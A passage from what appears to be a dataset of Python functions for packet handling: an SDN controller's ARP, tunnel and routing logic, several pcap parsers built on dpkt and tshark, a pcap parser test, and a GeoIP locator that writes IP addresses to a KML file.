packet')\n # return\n\n ##ARP request recieved - send 'I'm here' response\n if match['eth_type'] == 0x0806 and match['arp_op'] == 1:\n LOG.debug(\"ARP request accepted\")\n _arp_send(dp=dp, port_out=match['in_port'], arp_code=2, eth_dst=match['eth_src'], eth_target=match['arp_sha'],\n ip_target=match['arp_spa'], ip_sender=match['arp_tpa'])\n LOG.debug('Reply to '+match['arp_spa'] +': Host '+match['arp_tpa']+' is at forwarder '+str(dp.id) + \" with ethX source MAC address\")\n return\n\n ##ARP response with target_ip==DISCOVERY_ARP_IP recieved - we found APN\n #\n # FIXED: All ARP responses are replied, regardless of the target IP\n #\n # TODO : At this point only ARPs belonging to the APNs networks subnet should\n # be answered\n if match['eth_type'] == 0x0806 and match['arp_op'] == 2:\n LOG.debug('TUNNEL MNGR: ARP response with target APN discovery IP recieved at controller, processing for APN extraction')\n pkt = packet.Packet(array.array('B', ev.msg.data))\n arp_pkt=pkt.get_protocol(arp.arp)\n apn_ip = arp_pkt.src_ip\n apn_mac= arp_pkt.src_mac\n port = match['in_port']\n\n ##Search for apn in APN_POOL to add mac addr. and update topology\n for sApn in APN_POOL:\n if sApn.ip_addr == apn_ip:\n LOG.debug('Recieved ARP response was from ' + sApn.name + ' APN')\n sApn.eth_addr = apn_mac\n sApn.port = port\n sApn.dpid = dp.id\n # Links towards APNs will not be measured\n topo.add_link(dp.id,str(sApn.name),port)\n topo.add_link(str(sApn.name),dp.id,0)\n topo.reload_topology()\n LOG.debug('TUNNEL MNGR: APN '+str(sApn.name)+' found at forwarder: '+str(dp.id)+', port: '+str(port) + ' by ARP search')\n\n ##Add special rules to edge forwarder\n self.on_edge_inet_dp_join(dp, port, sApn)\n\n # FIX: We do not handle bss as a special APN\n # For greater extensibility, BSS/UTRAN/LAN APNs (exit/enter) points\n # will be handled in a generic manner\n #\n ##Create MAC-tunnels between APN and all BSSs\n #for bss in BSS_POOL:\n # self.add_tunnel(bss,apn)\n #break\n\n ### WMNC: In this case, we are not making tunnels between\n # two types of ingress/egress point, but actually same type\n\n for dApn in APN_POOL:\n # we are cycling through all possible APNs, looking for different APN tupples\n # with filled HW addresses (already found by APN search)\n if sApn != dApn and dApn.eth_addr != None:\n LOG.debug('TUNNEL MNGR: Different APNs with filled HW address found, lets find out if there is tunnel between them')\n\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('TUNNEL MNGR: No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next APN discovered.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n\n\n return\n\n ##ICMP echo with dst_ip==DISCOVERY_IP_DST recieved - new link between forwarders is up\n if match['eth_type'] == 0x0800 and match['ipv4_dst'] == DISCOVERY_IP_DST and match['ip_proto'] == 1:\n #LOG.debug('TOPO MNGR: ICMP echo recieved at controller, processing for link extraction or latency measurement')\n\n pkt = packet.Packet(array.array('B', ev.msg.data))\n\n ##Discovery pings carry information about sending datapath in payload of icmp packet\n ##these information are in Dictionary format, we parse the out with _icmp_parse_payload() method\n body = _icmp_parse_payload(pkt)\n neighbourDPID=body['dpid']\n neighbourPort=body['port_out']\n\n ## measurement\n ## currentClock moved way up to improve precision\n receivedClock=float(body['clock'])\n currentClock = time.clock()\n latency = currentClock - receivedClock\n\n currentDate = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n ##Update latency or add new edges to topology.\n if topo.DynamicGraph.has_edge(dp.id, neighbourDPID) and topo.DynamicGraph.has_edge(neighbourDPID, dp.id):\n topo.StaticGraph[neighbourDPID][dp.id]['pdv'] = topo.StaticGraph[neighbourDPID][dp.id]['lat'] - latency\n topo.StaticGraph[neighbourDPID][dp.id]['lat'] = latency\n topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n #topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n loss = self.loss_update(neighbourDPID, dp.id, currentDate)\n #LOG.debug('TOPO MNGR: Updating latency ' + str(latency) + ' and date ' + str(currentDate) + ' LOSS: ' + str(loss))\n topo.reload_topology()\n else:\n ## latency not correct for both directions when adding links\n ## update occurs on receive of next measurement packet from oposite direction\n topo.add_link(dp.id, neighbourDPID, ev.msg.match['in_port'], latency, currentDate)\n topo.add_link(neighbourDPID, dp.id, neighbourPort , latency, currentDate)\n LOG.debug('TOPO MNGR: Topology changed: New link between forwarder ID '+str(dp.id)+ ' via port ' + str(ev.msg.match['in_port'])\n +' and forwarder ID '+str(neighbourDPID)+ ' via port ' + str(neighbourPort) + ' was discovered.')\n\n topo.reload_topology()\n ## retry to create tunnels\n ## find better paths between APNs\n for sApn in APN_POOL:\n for dApn in APN_POOL:\n if sApn != dApn:\n LOG.debug('TOPO MNGR: Topology changed: trying to re-build inactive tunnel between:' + sApn.name + ' and ' + dApn.name)\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next fwd connects.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n return\n\n # flow of last resort (process for routing)\n if match['eth_type'] == 0x0800:\n # LOG.debug('*****************Flow of last resort matched(plain IP), process for routing********'\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'] + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp'])))\n ## Not very proud of myself, but it will do the trick\n ## Turbo lumberjack routing logic\n ## TODO: Implement a longest prefix match routing\n\n candidates = []\n\n for source, destination, ip_dscp in routesList:\n if ((source == match['ipv4_dst'] and destination == match['ipv4_src']) or (source == match['ipv4_src'] and destination == match['ipv4_dst'])) and ip_dscp == match['ip_dscp']:\n # LOG.debug('ROUTING: route source: ' + str(source) + 'destination: ' + str(destination)\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'])\n # + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(ip_dscp)\n # + ' already exists, aborting addition of new route')\n return\n\n for tunnel in TUNNELS:\n if (tunnel.sApn.ip_addr == match['ipv4_dst'] and tunnel.dApn.ip_addr == match['ipv4_src']) or (tunnel.sApn.ip_addr == match['ipv4_src'] and tunnel.dApn.ip_addr == match['ipv4_dst']):\n LOG.debug('ROUTING: Tunnel candidate found in list of tunnels. Adding tunnel path: ' + str(tunnel.po_edges) + ' to candidates.')\n candidates.append(tunnel)\n\n trafficClass = self.TC_selection(match['ip_dscp'])\n\n if len(candidates) == 0:\n LOG.debug('ROUTING: match[ipv4_dst]: ' + str(match['ipv4_dst'])\n + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp']))\n LOG.debug('ROUTING: ERROR, NO feasible tunnels for such route.')\n return\n\n LOG.debug('Looking for tunnels: DST_IP: ' + match['ipv4_dst'] + ' SRC_IP: ' + match['ipv4_src'] + ' DSCP: ' + str(match['ip_dscp']) + '(traffic class: ' + str(trafficClass) + ')' + ' Incoming from FWD: ' + str(dp.id))\n tunnel = self.tunnel_selection(trafficClass, candidates)\n LOG.debug('TE MNGR: Selected tunnel Path out: ' + str(tunnel.path_out_str) + ' meter_id: ' + str(tunnel.meter_id))\n\n dscp = match['ip_dscp']\n\n ## meter_id\n ## 2,4,6,8,10 = 500kbps, 1,3,5,7,9 = 1000kbps ...\n ## 0 = 100Gbps\n meter_id = tunnel.meter_id\n\n #\n # FIXME: incomplete set of rules installed on LAN Access forwarders\n # TODO : Philosophy of table IDs should be clarified, as now it total mess!!!\n # TODO : this should be done only once, from that moment, all user plane packets\n # should travelse only forwarder and should not be sent to controller\n\n\n\n #WAY OUT\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.dApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_src=tunnel.tid_in), parser.OFPActionSetField(eth_dst=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id=INGRESS_TABLE)\n dp.send_msg(req)\n\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.dApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.dApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_out))\n\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_out)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.dApn.eth_addr), parser.OFPActionOutput(tunnel.path_out[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.dApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_out)+ ' dApn ETH addr: ' + str(tunnel.dApn.eth_addr))\n\n #WAY IN\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.sApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.tid_in), parser.OFPActionSetField(eth_src=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id = INGRESS_TABLE)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.sApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.sApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_in))\n\n\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_in)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.sApn.eth_addr), parser.OFPActionOutput(tunnel.path_in[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.sApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_in)+ ' sApn ETH addr: ' + str(tunnel.sApn.eth_addr))\n\n\n LOG.debug('ROUTING: Rules on access edge forwarders installed')\n LOG.debug('ROUTING: Adding route: DST_IP: ' + tunnel.dApn.ip_addr + ' SRC_IP: ' + tunnel.sApn.ip_addr + ' dscp: ' + str(dscp) + ' path out str: ' + tunnel.path_out_str )\n routesList.append( ( tunnel.sApn.ip_addr, tunnel.dApn.ip_addr, dscp) )\n\n parser = dp.ofproto_parser\n\n for dpid in LAN_TYPE_FORWARDERS:\n ## DUNNO why this rule with low priority still hits traffic which is also matched by rules with IP address matches\n ## Here I delete the rule, it is added on FWD when it connects to controoller\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dpid) + ' is a LAN edge forwarder, deleting rules')\n dp = dpset.get(dpid)\n priority = 2\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE_STRICT,\n table_id=0, actions=actions,\n match=match, priority=priority)\n\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dp.id) + ' is a LAN edge forwarder, installing rules again :)')\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.add_flow(dp, 2, match, actions)", "def process(self):\n fp = open(self.pcap, \"rb\")\n pkts = dpkt.pcap.Reader(fp)\n if self.sip and self.dip and self.sp and self.dp:\n self.process_pkts(pkts)", "def filter(self):\n # outfile = open(self.newpcap, 'wb')\n # writer = dpkt.pcap.Writer(outfile)\n f = open(self.pcapfile, 'rb')\n packets = dpkt.pcap.Reader(f)\n\n for timestamp, buf in packets:\n eth = dpkt.ethernet.Ethernet(buf)\n if not isinstance(eth.data, dpkt.ip.IP): # 确保以太网数据包含一个IP数据包, Non IP Packet type not supported\n continue # 过滤空IP包\n ip = eth.data # 获取以太网帧(IP数据包)\n if not isinstance(ip.data, dpkt.tcp.TCP): # 在传输层中检查TCP\n continue\n tcp = ip.data # 获取tcp数据\n # print('-->TCP Data: ', repr(tcp))\n\n \"\"\" 过滤三次握手后的首包\"\"\"\n seq = self.seq_pattern.findall(repr(tcp))\n ack = self.ack_pattern.findall(repr(tcp))\n if not (seq or ack): # seq、ack必须有一个, 一真即真\n continue\n if ack:\n ack = ack[0]\n if seq:\n seq = seq[0]\n\n if not ack and seq: # 一次握手请求\n self.hash_table[seq] = {}\n self.stream_table[seq] = [buf]\n if ack and seq: # 二次、三次、交流包\n if str(int(ack) - 1) in self.hash_table.keys(): # 有一次握手记录\n number = str(int(ack) - 1)\n if 'second' not in self.hash_table[number].keys(): # 新增二次握手\n self.hash_table[number]['second'] = {'seq': seq, 'ack': ack}\n self.stream_table[number].append(buf) # 将二次握手添加到buf\n self.resp_relation[seq] = ack # 新增关系表\n\n # 存在二次握手记录, 看hash表有无第三次握手记录, 有就保存stream流\n # 基本就是traffic响应包了\n elif 'three' in self.hash_table[number].keys():\n if number not in self.stream_table.keys():\n self.stream_table[number] = []\n self.stream_table[number].append(buf)\n else:\n self.stream_table[number].append(buf)\n\n # ack-1没有对应的hash表, 可能是三次握手或traffic请求包\n elif str(int(seq) - 1) in self.hash_table.keys():\n number = str(int(seq) - 1)\n if 'second' not in self.hash_table[number]:\n pass\n elif 'three' not in self.hash_table[number]: # 三次包\n self.hash_table[number]['three'] = {'seq': seq, 'ack': ack}\n self.stream_table[number].append(buf)\n # 否则就是traffic包了\n else:\n if number not in self.stream_table.keys():\n self.stream_table[number] = []\n self.stream_table[number].append(buf)\n else:\n self.stream_table[number].append(buf)\n # traffic响应包\n elif str(int(seq) - 1) in self.resp_relation.keys():\n number = str(int(seq) - 1)\n second_ack = self.resp_relation[number]\n number = str(int(second_ack) - 1)\n if number not in self.stream_table.keys():\n self.stream_table[number] = []\n self.stream_table[number].append(buf)\n else:\n self.stream_table[number].append(buf)\n else:\n continue # seq不存在\n\n # outfile.close()\n f.close()", "def get_connections(capture):\n ip_dict = dict()\n for pkt in capture:\n\n if not hasattr(pkt, \"ip\") and not hasattr(pkt, \"ipv6\"):\n continue\n\n protocol = pkt.highest_layer\n\n tcp_dst_port = None\n tcp_src_port = None\n if hasattr(pkt, \"tcp\"):\n tcp_src_port = pkt.tcp.srcport\n tcp_dst_port = pkt.tcp.dstport\n\n if hasattr(pkt, \"ip\"):\n if pkt.ip.src.startswith(\"192.168.178\"):\n ip, dst = pkt.ip.src, pkt.ip.dst\n else:\n ip, dst = pkt.ip.dst, pkt.ip.src\n tcp_dst_port = tcp_src_port\n else:\n # TODO: how to discern src and dst in IPv6?\n ip, dst = pkt.ipv6.src, pkt.ipv6.dst\n\n ip = \"%s\" % ip\n dkey = (\n \"%s\" % protocol,\n int(tcp_dst_port) if tcp_dst_port else None,\n \"%s\" % dst\n )\n if ip not in ip_dict:\n ip_dict[ip] = {dkey: 1}\n else:\n ip_dict[ip][dkey] = ip_dict[ip].get(dkey, 0) + 1\n return ip_dict", "def process_pcap(self):\n fp = open(self.pcap, \"rb\")\n pkts = dpkt.pcap.Reader(fp)\n self.process_pkts(pkts)", "def handle_tcp(pkt, packets, i, start_point):\r\n src_port = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n dest_port = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n sequence_num = int(pkt[start_point:start_point+8], 16)\r\n start_point += 8\r\n acknowledgment = int(pkt[start_point:start_point+8], 16)\r\n start_point += 8\r\n data_offset = int(pkt[start_point], 16) * 4\r\n start_point += 2\r\n flags = pkt[start_point:start_point+2]\r\n flags_str = \"\"\r\n for f in flags:\r\n flags_str += str(format(int(f), '04b'))\r\n start_point += 2\r\n window_size = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n checksum_value = pkt[start_point:start_point+4]\r\n start_point += 4\r\n urgent_pointer = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n options = int((2 * packets[i][0][0] - start_point)/2)\r\n\r\n packets[i][2].append(src_port)\r\n packets[i][2].append(dest_port)\r\n packets[i][2].append(sequence_num)\r\n packets[i][2].append(acknowledgment)\r\n packets[i][2].append(data_offset)\r\n packets[i][2].append(flags_str)\r\n packets[i][2].append(window_size)\r\n packets[i][2].append(checksum_value)\r\n packets[i][2].append(urgent_pointer)\r\n packets[i][2].append(options)\r\n return packets", "def reader(self):\n while self.alive:\n try:\n data = self.serial.read_until(b'~')[:-1]\n packet = ethernet.Ethernet(data)\n if packet[icmp.ICMP]:\n packet[ethernet.Ethernet].dst_s = \"dc:a6:32:00:a7:8b\"\n packet[ip.IP].dst_s = \"192.168.1.35\"\n packet[icmp.ICMP].sum = b'0x1783'\n print(\"\\n\\n__________________RESPONSE FROM VISIBLE PI__________________\")\n print(packet)\n if data:\n self.write(packet.bin())\n except socket.error as msg:\n break\n self.alive = False", "def udp_iterator(pc):\n\tfor time,pkt in pc:\n\t\teth = dpkt.ethernet.Ethernet(pkt)\n\t\tif eth.type == dpkt.ethernet.ETH_TYPE_IP:\n\t\t ip = eth.data\n\t\t # if the IP protocol is UDP, process it further\n\t\t if ip.p == dpkt.ip.IP_PROTO_UDP :\n\t\t\tudp = ip.data\n\t\t\tyield( ip.src, udp.sport, ip.dst, udp.dport, udp.data )", "def read_and_store_pcap(file_name):\r\n file = open(file_name, \"rb\")\r\n global_header = file.read(24).hex()\r\n byte = file.read(16)\r\n packets = []\r\n bytes = []\r\n sizes = []\r\n while byte:\r\n packet_header = byte.hex()\r\n # parse the size for each packet\r\n size = struct.unpack(\"<L\", codecs.decode(str(packet_header[16:24]), \"hex\"))[0]\r\n sizes.append(size)\r\n # read the whole packet by its size from the bytes\r\n byte = file.read(size).hex()\r\n bytes.append(byte)\r\n byte = file.read(16)\r\n for size in sizes:\r\n packets.append(([size], [], []))\r\n i = 0\r\n\r\n for pkt in bytes:\r\n packets = handle_pkt_header(pkt, packets, i)\r\n packets, start_point = handle_ip_header(pkt, packets, i)\r\n protocol = packets[i][1][7]\r\n if protocol == 1:\r\n packets = handle_icmp(pkt, packets, i, start_point)\r\n elif protocol == 6:\r\n packets = handle_tcp(pkt, packets, i, start_point)\r\n elif protocol == 17:\r\n packets = handle_udp(pkt, packets, i, start_point)\r\n i += 1\r\n # print(packets)\r\n return packets", "def testParse(self):\n parser = pcap.PcapParser()\n storage_writer = self._ParseFile(['test.pcap'], parser)\n\n # PCAP information:\n # Number of streams: 96 (TCP: 47, UDP: 39, ICMP: 0, Other: 10)\n #\n # For each stream 2 events are generated one for the start\n # and one for the end time.\n\n self.assertEqual(storage_writer.number_of_events, 192)\n\n events = list(storage_writer.GetEvents())\n\n # Test stream 3 (event 6).\n # Protocol: TCP\n # Source IP: 192.168.195.130\n # Dest IP: 63.245.217.43\n # Source Port: 1038\n # Dest Port: 443\n # Stream Type: SSL\n # Starting Packet: 4\n # Ending Packet: 6\n\n event = events[6]\n self.assertEqual(event.packet_count, 3)\n self.assertEqual(event.protocol, 'TCP')\n self.assertEqual(event.source_ip, '192.168.195.130')\n self.assertEqual(event.dest_ip, '63.245.217.43')\n self.assertEqual(event.dest_port, 443)\n self.assertEqual(event.source_port, 1038)\n self.assertEqual(event.stream_type, 'SSL')\n self.assertEqual(event.first_packet_id, 4)\n self.assertEqual(event.last_packet_id, 6)\n\n # Test stream 6 (event 12).\n # Protocol: UDP\n # Source IP: 192.168.195.130\n # Dest IP: 192.168.195.2\n # Source Port: 55679\n # Dest Port: 53\n # Stream Type: DNS\n # Starting Packet: 4\n # Ending Packet: 6\n # Protocol Data: DNS Query for wpad.localdomain\n\n event = events[12]\n self.assertEqual(event.packet_count, 5)\n self.assertEqual(event.protocol, 'UDP')\n self.assertEqual(event.source_ip, '192.168.195.130')\n self.assertEqual(event.dest_ip, '192.168.195.2')\n self.assertEqual(event.dest_port, 53)\n self.assertEqual(event.source_port, 55679)\n self.assertEqual(event.stream_type, 'DNS')\n self.assertEqual(event.first_packet_id, 11)\n self.assertEqual(event.last_packet_id, 1307)\n self.assertEqual(\n event.protocol_data, 'DNS Query for wpad.localdomain')\n\n expected_message = (\n 'Source IP: 192.168.195.130 '\n 'Destination IP: 192.168.195.2 '\n 'Source Port: 55679 '\n 'Destination Port: 53 '\n 'Protocol: UDP '\n 'Type: DNS '\n 'Size: 380 '\n 'Protocol Data: DNS Query for wpad.localdomain '\n 'Stream Data: \\'\\\\xb8\\\\x9c\\\\x01\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00'\n '\\\\x00\\\\x00\\\\x04wpad\\\\x0blocaldomain\\\\x00\\\\x00\\\\x01\\\\x00\\\\x01\\\\xb8'\n '\\\\x9c\\\\x01\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x04wpa\\' '\n 'First Packet ID: 11 '\n 'Last Packet ID: 1307 '\n 'Packet Count: 5')\n expected_short_message = (\n 'Type: DNS '\n 'First Packet ID: 11')\n\n self._TestGetMessageStrings(event, expected_message, expected_short_message)", "def convert_pcap_to_dataframe(input_file):\r\n if not os.path.exists(input_file):\r\n raise IOError(\"File \" + input_file + \" does not exist\")\r\n\r\n tshark_fields = \"-e frame.time_epoch \" \\\r\n \"-e _ws.col.Source \" \\\r\n \"-e _ws.col.Destination \" \\\r\n \"-e _ws.col.Protocol \" \\\r\n \"-e frame.len \" \\\r\n \"-e ip.ttl \" \\\r\n \"-e ip.flags.mf \" \\\r\n \"-e ip.frag_offset \" \\\r\n \"-e icmp.type \" \\\r\n \"-e tcp.srcport \" \\\r\n \"-e tcp.dstport \" \\\r\n \"-e udp.srcport \" \\\r\n \"-e udp.dstport \" \\\r\n \"-e dns.qry.name \" \\\r\n \"-e dns.qry.type \" \\\r\n \"-e http.request \" \\\r\n \"-e http.response \" \\\r\n \"-e http.user_agent \" \\\r\n \"-e tcp.flags.str \" \\\r\n \"-e ntp.priv.reqcode \"\r\n\r\n temporary_file = tempfile.TemporaryFile(\"r+b\")\r\n\r\n # print(shutil.which(command))\r\n\r\n p = subprocess.Popen([settings.TSHARK + \" -n -r \\\"\" + input_file + \"\\\" -E separator='\\x03' -E header=y -T fields \" + tshark_fields],\r\n shell=True, stdout=temporary_file) #\\x03 is ETX\r\n p.communicate()\r\n p.wait()\r\n\r\n # Reset file pointer to start of file\r\n temporary_file.seek(0)\r\n\r\n df = pd.read_csv(temporary_file, sep=\"\\x03\", low_memory=False, error_bad_lines=False)\r\n\r\n temporary_file.close()\r\n\r\n if ('tcp.srcport' in df.columns) and ('udp.srcport' in df.columns) and ('tcp.dstport' in df.columns) and \\\r\n ('udp.dstport' in df.columns):\r\n # Combine source and destination ports from tcp and udp\r\n df['srcport'] = df['tcp.srcport'].fillna(df['udp.srcport'])\r\n df['dstport'] = df['tcp.dstport'].fillna(df['udp.dstport'])\r\n\r\n df['srcport'] = df['srcport'].apply(lambda x: int(x) if str(x).replace('.', '', 1).isdigit() else 0)\r\n df['dstport'] = df['dstport'].apply(lambda x: int(x) if str(x).replace('.', '', 1).isdigit() else 0)\r\n\r\n # Remove columns: 'tcp.srcport', 'udp.srcport','tcp.dstport', 'udp.dstport'\r\n df.drop(['tcp.srcport', 'udp.srcport', 'tcp.dstport', 'udp.dstport'], axis=1, inplace=True)\r\n\r\n # Drop all empty columns (for making the analysis more efficient! less memory.)\r\n df.dropna(axis=1, how='all', inplace=True)\r\n df = df.fillna(0)\r\n\r\n if 'icmp.type' in df.columns:\r\n df['icmp.type'] = df['icmp.type'].astype(str)\r\n\r\n if 'ip.frag_offset' in df.columns:\r\n df['ip.frag_offset'] = df['ip.frag_offset'].astype(str)\r\n\r\n if 'ip.flags.mf' in df.columns:\r\n df['ip.flags.mf'] = df['ip.flags.mf'].astype(str)\r\n\r\n if ('ip.flags.mf' in df.columns) and ('ip.frag_offset' in df.columns):\r\n # Analyse fragmented packets\r\n df['fragmentation'] = (df['ip.flags.mf'] == '1') | (df['ip.frag_offset'] != '0')\r\n df.drop(['ip.flags.mf', 'ip.frag_offset'], axis=1, inplace=True)\r\n\r\n if 'tcp.flags.str' in df.columns:\r\n df['tcp.flags.str'] = df['tcp.flags.str'].str.encode(\"utf-8\") \r\n\r\n return df", "def print_info(self):\n \n i = 1\n for pcap_packet in self.pcap_packets:\n print '----------------frame: %d------------' % i\n i += 1\n pcap_packet.ethernet.print_info()\n \n #skip the packet that is not ip packet\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n \n print '################# packet in the frame ################'\n pcap_packet.ip.print_info()\n \n #skp the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n print '@@@@@@@@@@@@@@@@@@@ tcp fields @@@@@@@@@@@@@@@@@@@@'\n pcap_packet.tcp.print_info()\n \n print\n #endof for", "def print_info(self):\n \n i = 1\n for pcap_packet in self.pcap_packets:\n print '----------------frame: %d------------' % i\n i += 1\n pcap_packet.ethernet.print_info()\n \n #skip the packet that is not ip packet\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n \n print '################# packet in the frame ################'\n pcap_packet.ip.print_info()\n \n #skp the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n print '@@@@@@@@@@@@@@@@@@@ tcp fields @@@@@@@@@@@@@@@@@@@@'\n pcap_packet.tcp.print_info()\n \n print\n #endof for", "def _read_packets(self, reader: Par2FileReader):\n start_count = len(self)\n pointers = reader.get_pointers()\n # Create RecoverySets if needed\n for set_id, pointer_set in packets.by_set_id(pointers).items():\n print(set_id.hex(), pointer_set)\n if set_id not in self.recovery_sets.keys():\n # Create a RecoverySet if needed\n self.recovery_sets[set_id] = RecoverySet(set_id)\n for pointer in pointer_set:\n self.recovery_sets[set_id].packets.add(pointer)\n logger.info(\"Added {} new packets\".format(len(self) - start_count))", "def locator(pcap_obj,kml_file):\r\n ip_list = []\r\n for ts, buf in pcap_obj:\r\n eth = dpkt.ethernet.Ethernet(buf)\r\n ip = eth.data\r\n try: # extract all unique IPs\r\n src_ip = str(socket.inet_ntoa(ip.src))\r\n dst_ip = str(socket.inet_ntoa(ip.dst))\r\n if src_ip in ip_list:\r\n pass\r\n else:\r\n ip_list.append(src_ip)\r\n if dst_ip in ip_list:\r\n pass\r\n else:\r\n ip_list.append(dst_ip)\r\n except AttributeError:\r\n pass\r\n\r\n try:\r\n reader = geoip2.database.Reader('GeoLite2-City_20190129.mmdb') # reading from db(can be redacted)\r\n except FileNotFoundError:\r\n print(f'[!]DB file not in current directory or with a different file name')\r\n sys.exit(1)\r\n area = []\r\n longitude = []\r\n latitude = []\r\n ips = []\r\n for ip_addr in ip_list:\r\n try:\r\n rec = reader.city(ip_addr) # reading IP\r\n country = rec.country.iso_code # assigning country and city\r\n city = rec.city.name\r\n if city is None and country is None:\r\n area.append('Unknown')\r\n elif city is None:\r\n area.append(f'Unknown city:{country}') # looking for unknown country\r\n elif country is None:\r\n area.append(f'Unknown country:{city}') # looking for unknown city\r\n else:\r\n area.append(f'{city} {country}')\r\n\r\n longitude.append(rec.location.longitude)\r\n latitude.append(rec.location.latitude)\r\n ips.append(ip_addr)\r\n except geoip2.errors.AddressNotFoundError:\r\n pass\r\n\r\n try:\r\n kml = simplekml.Kml()\r\n final_path = str(os.getcwd() + os.sep + kml_file) # defining full canonical path\r\n for i in range(0, len(ips)):\r\n kml.newpoint(name=(area[i]),\r\n coords=[(longitude[i], latitude[i])],\r\n description=f'[+] Location = {area[i]}\\n IP: {ips[i]}')\r\n kml.save(final_path)\r\n print(f\"[+] Writing IP locations to {kml_file}\") # writing data to a KML file\r\n print(f\"[+] Opening Google Earth with:{kml_file}\\n\") # reading file with google earth\r\n try:\r\n os.startfile(final_path)\r\n except OSError:\r\n print(f'[!] Warning: Google Earth must be installed to open the kml')\r\n except 